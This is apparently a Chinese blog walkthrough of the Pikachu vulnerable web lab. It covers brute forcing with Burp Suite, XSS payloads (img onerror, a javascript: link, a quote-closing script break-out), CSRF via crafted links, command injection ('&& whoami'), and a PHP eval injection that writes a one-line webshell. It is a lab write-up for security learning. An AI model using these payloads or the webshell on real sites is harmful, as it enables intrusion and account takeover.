当前位置: 首页 > news >正文

pikachu

暴力破解

基于表单的暴力破解

【2024版】最新BurpSuit的使用教程(非常详细)零基础入门到精通,看一篇就够了!让你挖洞事半功倍!_burpsuite使用教程-CSDN博客

登录页面,随意输入抓包,发送到攻击模块

我们攻击要两个目标,选择集群炸弹攻击,用户名是wp看到的

导入弱密码本开始攻击,看到三组账号密码

返回登录即可

验证码绕过(on server

同样随意输入抓包

和上关一样的操作,抓到的账号密码也和上关一样,随后发送到重放器修改正确的账号密码发送即可

验证码绕过(on client)

同上一样的操作,抓包爆破,得到的账号密码也一样

token防爆破

抓包

可以看到有token值,token是后端产生的一个字符串,并且会发给前端,每当前端发起一次登录请求时,就会把该token一起发给后端,后端在验证账号密码前会先验证token的值是否正确然后才会验证账号密码;后端每收到一次请求就会产生一个新的token,同时把token连同响应信息一起发给前端

可以看到token在前端,而且很长,是由定义的计算得来的,所以我们没办法直接爆破

我们使用干草叉爆破,密码照样导入密码本

token的payload模式如图选择,在设置中选定payload值

获取响应之后选中token值,会自己设置payload值攻击得到密码和token值

发送到重放器发送即可

反射型xss(get)

打开想输入常规的检查语句触发弹窗,发现有字数限制

直接改源码

再发送即可

反射性xss(post)

先是登录界面,和第一关一样爆破而已这里直接用之前的账号密码登录

再是使用上一关的做法即可

存储型xss

同上

DOM型xss

尝试,显然不行

看源码可以看到超链接等于我们输入的值

那么输入JavaScript:alert()为协议触发js代码执行即可打开弹窗

DOM型xss-x

尝试输入弹窗字符串显然没用,看源码

还是有超链接,同上

xss盲打

输入弹窗字符没反应,看源码甚至前端都没有输入的字符

了解原理

在一些网站应用中,存在 XSS 漏洞的页面可能并不直接在当前用户的浏览器中显示,或者即使存在漏洞但由于页面的显示逻辑、访问权限等原因,攻击者无法即时看到注入的恶意脚本是否执行以及执行的结果。此时,攻击者将恶意脚本注入到目标网站中,当满足特定条件(比如管理员或其他具有特定权限的用户访问了包含恶意脚本的页面)时,恶意脚本会在目标用户(通常是权限较高的用户)的浏览器中执行。恶意脚本执行后,会将窃取到的敏感信息(如用户的 Cookie、会话令牌等)发送到攻击者控制的服务器上,攻击者就可以利用这些信息进一步控制用户的账号或进行其他非法操作。

简单来说我们在外来普通账户去输入恶意代码是会被强制发送到后端,我们无法看到代码是否执行,我们需要得到类似管理员账号登录后再进行操作,才可能执行成功

这边也有给提示后台的地址

先发送代码,之后登录后台即可

xss之过滤

输入弹窗代码,给了提示估计是一些字符串被过滤了

看样子是<>被过滤了,尝试onfocus事件

也是不行,回头看上传的字符串像是被删除了<script>alert()</script>变成了>,尝试使用双写字符绕过<scri<script>pt> alert()</scri</script>pt>,还是一样错了,那应该不是简单的替换

答案是使用img标签进行弹窗

<img src=''οnerrοr='alert(1)'/>

xss之htmlspecialchars

输入弹窗代码,可以看到还是有超链接

使用js为协议触发超链接即可

xss之href输出

同上,有超链接

和上面一样的解决办法

xss之js输出

输入弹窗代码,没有反应也没有超链接

随意输入字符发现把我们输入的字符用<script><script>包裹且中间有一些判定条件

按照提示输入tmac弹出图片

原本是会执行alert(ms)并输出语句的但是这行代码被加了注释,所以只会输出语句,现在的思路就是要构造ms去弹窗,就是考对js代码的运用而已

答案是';alert();//     先用'闭合前面加注释的字符串,再用;分割开使后面的代码能够正常运行后面还要加//注释也是保证代码运行

CSRF(get) login

随意输入之后抓取,开始爆破

爆破没有结果,之后看提示给了账号密码,随意选一个登录

随意修改之后抓包

仔细看会发现给了一个地址,使用在线编辑器编辑一个网站内容是抓包的链接,因为本题是get传参所以可以用链接来请求

发送给目标若点击链接即可修改信息

CSRF(post)

同样登录一个账号

修改抓包

post请求要自己去写一个表单,放在网站的目录中,当用户点击就会被修改信息,这边等代码知识扎实一点再来

CSRF Token

同上

exec "ping

尝试ping一下本地地址

输入127.0.0.1 && whoami,可获得信息

“&&”在命令行中通常表示逻辑与操作,即只有当左边的命令成功执行后,才会执行右边的命令。“whoami”是一个命令,用于显示当前用户的名称,先尝试ping地址,如果成功再执行“whoami”命令显示当前用户名称。

exec "eval"

随意输入

根据提示,我们提交的字符串会以eval(字符串)形式执行,而eval()函数会将括号中正确的php代码当成php文件执行,所以我们在里面生成一个一句话木马即可

file_put_contents('456.php','<?php eval(@$_REQUEST[456]);?>');

创建一个名为456.php的文件使用file_put_contents()函数将一句话木马写进456.php

上传蚁剑链接

相关文章:

  • MySQL 时区参数 time_zone 详解
  • 边缘计算收益低的三大指标
  • 使用Modbus协议西门子 S7-200 SMART PLC 通信
  • 组件传递props校验
  • leetcode59------螺旋矩阵II
  • sqlilab 46 关(布尔、时间盲注)
  • 用数组实现树的存储遍历【复习笔记】
  • 3DUNet-Pytorch-master环境配置(3dunet)
  • (IDE接入DeepSeek)简单了解DeepSeek接入辅助开发与本地部署建议
  • 【前端基础】Day 2 CSS层叠样式表
  • 说一下 SpringMVC的运行流程?
  • 代码随想录算法【Day54】
  • 系统架构设计:软件测试需要掌握的常用方法
  • pytorch阶段性总结1
  • 前端模拟请求池-浏览器同时发起大量请求
  • mysql 拼接多行合并为一行
  • 入门网络安全工程师要学习哪些内容【2025年寒假最新学习计划】
  • 机试刷题_HJ106 字符逆序【python】
  • 【实战 ES】实战 Elasticsearch:快速上手与深度实践-1.1.2典型应用场景:日志分析、实时搜索、推荐系统
  • Redis|事务
  • 乌外长:乌方准备无条件停火至少30天
  • 游戏论|暴君无道,吊民伐罪——《苏丹的游戏》中的政治
  • 马云再次现身阿里打卡创业公寓“湖畔小屋”,鼓励员工坚持创业精神
  • 新修订的《婚姻登记条例》明起施行,领证不用户口本了
  • 2025中国品牌日上海践行活动启动,将建设品牌生态交互平台
  • 哥伦比亚总统称将在访华期间签署“一带一路”倡议意向书,外交部回应